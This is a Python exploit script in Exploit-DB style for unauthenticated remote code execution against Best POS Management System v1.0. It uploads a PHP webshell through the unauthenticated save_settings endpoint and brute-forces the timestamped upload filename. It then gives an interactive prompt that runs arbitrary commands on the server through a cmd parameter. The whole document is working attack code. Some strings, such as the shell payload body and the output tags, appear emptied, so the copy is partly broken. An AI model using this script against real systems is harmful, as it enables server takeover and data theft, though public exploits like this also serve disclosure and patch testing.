# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution # Google Dork: NA # Date: 15/5/2023 # Exploit Author: Mesut Cetin # Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip # Version: 1.0 # Tested on: Kali Linux import sys import requests import subprocess import time if len(sys.argv) < 2: print("\033[91mUsage: %s \033[0m" % sys.argv[0]) print("Example: %s 192.168.106.130" % sys.argv[0]) sys.exit(1) ip = sys.argv[1] url = f"http://{ip}/kruxton/ajax.php?action=save_settings" def brute_force_timestamp(timestamp_prev, ip): progress = 0 webshell = None for i in range(20): for j in range(0, 1000, 20): timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php" response = requests.get(url) if response.status_code == 200: webshell = url break progress += 1 print(f"Attempt {progress}/400", end="\r") time.sleep(0.1) if progress >= 400: break if webshell or progress >= 400: break if webshell: print("\033[92m[+] Webshell found:", webshell, "\033[0m") else: print("\033[91m[-] Webshell not found\033[0m") return webshell def get_unix_timestamp(): timestamp = subprocess.check_output(['date', '+%s']).decode().strip() return int(timestamp) def extract_output(response_text): start_tag = "

"
    end_tag = "

" start_index = response_text.find(start_tag) end_index = response_text.find(end_tag) if start_index != -1 and end_index != -1 and start_index < end_index: output = response_text[start_index + len(start_tag):end_index] return output.strip() return None def code_execution(webshell): if not webshell: print("\033[91mWebshell URI not provided\033[0m") return while True: command = input("Enter command to execute (or 'exit' to quit): ") if command == 'exit': break url = webshell + f"?cmd={command}" response = requests.get(url) output = extract_output(response.text) if output: print("\033[93m[+] Output:\033[0m") print(output) else: print("\033[91m[-] No output received\033[0m") data = '''\ -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="name" test -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="email" test@gmail.com -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="contact" 9000000000 -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="about" test -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/x-php

-----------------------------49858899034227071432271107689--''' headers = { 'Host': f"{ip}", 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689', 'Content-Length': str(len(data)), 'Connection': 'close' } timestamp_prev = get_unix_timestamp() response = requests.post(url, data=data, headers=headers) if response.status_code == 200 and response.text == '1': print("[+] Timestamp: %s" % timestamp_prev) print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m") webshell = brute_force_timestamp(timestamp_prev, ip) code_execution(webshell) else: print("Did not worked")